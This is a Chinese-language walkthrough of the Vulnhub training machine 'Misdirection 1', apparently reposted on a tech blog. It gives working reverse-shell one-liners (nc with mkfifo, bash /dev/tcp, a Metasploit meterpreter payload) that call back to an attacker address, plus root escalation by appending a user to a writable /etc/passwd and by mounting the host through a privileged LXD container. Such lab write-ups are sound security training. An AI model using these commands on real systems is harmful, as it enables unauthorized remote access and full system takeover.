Vulnhub靶机:MISDIRECTION_ 1

有目标就不怕路远。年轻人.无论你现在身在何方.重要的是你将要向何处去。只有明确的目标才能助你成功。没有目标的航船.任何方向的风对他来说都是逆风。因此,再遥远的旅程,只要有目标.就不怕路远。没有目标,哪来的劲头?一车尔尼雷夫斯基

导读:本篇文章讲解 Vulnhub靶机:MISDIRECTION_ 1,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

介绍

系列:Misdirection(此系列共1台)
发布日期:2019 年 9 月 24 日
难度:初级
运行环境:官方推荐Virtualbox,我使用的是VMware
补充:靶机容易被干崩,下手轻点
目标:取得 root 权限
学习:

  • 主机发现
  • 端口扫描+漏洞扫描
  • 反弹shel
  • passwd提权
  • docker提权

靶机地址:https://www.vulnhub.com/entry/misdirection-1,371/

信息收集

主机发现

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测

nmap发现了一些有趣的目录,疑似发现了sql注入,经核实为误报

nmap -p- 192.168.229.137
nmap -p22,80,3306,8080 -A 192.168.229.137
nmap -p22,80,3306,8080 --script=vuln 192.168.229.137

在这里插入图片描述

网站探测

80端口常规探测没有发现什么有趣的信息,但是nmap发现了8080端口的一个有趣目录:debug
访问之后如下图,很明显是个命令执行漏洞
在这里插入图片描述

反弹shell

介绍3种方法

方式1:使用nc

由于靶机的nc没有-e参数,可以通过这种方式getshell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.229.128 1234 >/tmp/f

在这里插入图片描述

方式2:使用bash

bash -c 'bash -i >& /dev/tcp/192.168.229.128/9999 0>&1'

在这里插入图片描述

方式3:使用MSF

通过“Wappalyzer”得知,页面是php的,因此payload类型设置为php

use exploit/multi/script/web_delivery
show options
show targets
set target 1
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.229.128
exploit
sessions -i 1
shell
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

复制生成的命令,粘贴到靶机上面,一旦运行,我们就会拿到一个shell,由于靶机是有python的,可以通过python获取一个交互式的shell
在这里插入图片描述

在这里插入图片描述

提权

sudo提权

通过sudo提权,切换身份为brexit
在这里插入图片描述

passwd提权

丢个提权检查脚本,发现/etc/passwd具有可写权限,可以提权;似乎还可以docker提权
在这里插入图片描述

在这里插入图片描述

普普通通的passwd文件配置不当提权

openssl passwd -1 -salt hack hack123
echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0:root:/root:/bin/bash' >> /etc/passwd
tail /etc/passwd
su hack
hack123
id

在这里插入图片描述

docker提权

提权脚本检查到,似乎可以做docker提权,那就试试吧。

  1. 下载镜像

Linux 容器映像构建可在此处找到:https://us.lxd.images.canonical.com/images。我决定使用 Alpine Linux 映像,找到一个合适的镜像,使用kali全部下载下来

wget --no-parent -r https://us.lxd.images.canonical.com/images/alpine/3.15/amd64/default/20230104_13:00/
cd /us.lxd.images.canonical.com/images/alpine/3.15/amd64/default/20230104_13:00
find . -name '*html*' -delete
tar -cvf alpine.tar ./*

在这里插入图片描述

  1. 投递镜像
kali开启web服务
python -m http.server 80

靶机下载解压
wget http://192.168.229.128/alpine.tar
mkdir alpine
tar -xvf alpine.tar -C alpine
cd alpine

在这里插入图片描述

  1. 手动导入容器映像
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list
lxd init
lxc init alpine alpinect -c security.privileged=true
lxc config device add alpinect pwndisk disk source=/ path=/mnt/root recursive=true
lxc start alpinect
lxc exec alpinect /bin/sh

在这里插入图片描述

在这里插入图片描述

参考

https://benheater.com/vulnhub-misdirection-1/

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134196.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!